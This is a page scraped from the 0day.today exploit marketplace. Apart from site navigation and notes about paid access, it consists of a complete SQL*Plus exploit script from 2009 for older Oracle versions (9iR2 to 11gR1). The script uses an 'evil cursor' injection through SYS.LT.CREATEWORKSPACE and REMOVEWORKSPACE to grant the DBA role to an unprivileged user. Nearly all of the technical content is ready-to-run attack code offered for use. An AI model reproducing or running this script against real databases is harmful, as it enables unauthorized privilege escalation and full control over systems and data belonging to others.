0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit
================================================= Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit ================================================= # Title: Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit # CVE-ID: () # OSVDB-ID: () # Author: Andrea Purificato # Published: 2009-12-01 # Verified: yes view source print? -- -- sys-lt-removeworkspaceV2.sql -- -- -- Oracle SYS.LT.REMOVEWORKSPACE exploit (9iR2/10gR1,10gR2,11gR1) -- Evil cursor technique -- -- Grant dba permission to unprivileged user -- -- -- REF: http://www.google.it/search?q=SYS.LT.REMOVEWORKSPACE -- -- AUTHOR: Andrea "bunker" Purificato -- http://rawlab.mindcreations.com -- -- set serveroutput on; prompt [+] sys-lt-removeworkspaceV2.sql exploit prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2 prompt undefine the_user; accept the_user char prompt 'Target username (default TEST): ' default 'TEST'; prompt prompt [-] Creating evil cursor... DECLARE MYC NUMBER; BEGIN MYC := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction;begin execute immediate ''GRANT DBA TO &the_user'';commit;end;',0); SYS.LT.CREATEWORKSPACE('x''||dbms_sql.execute('||MYC||')||''--'); SYS.LT.REMOVEWORKSPACE('x''||dbms_sql.execute('||MYC||')||''--'); END; / prompt [-] YOU GOT THE POWAH!! # 0day.today [2024-07-07] #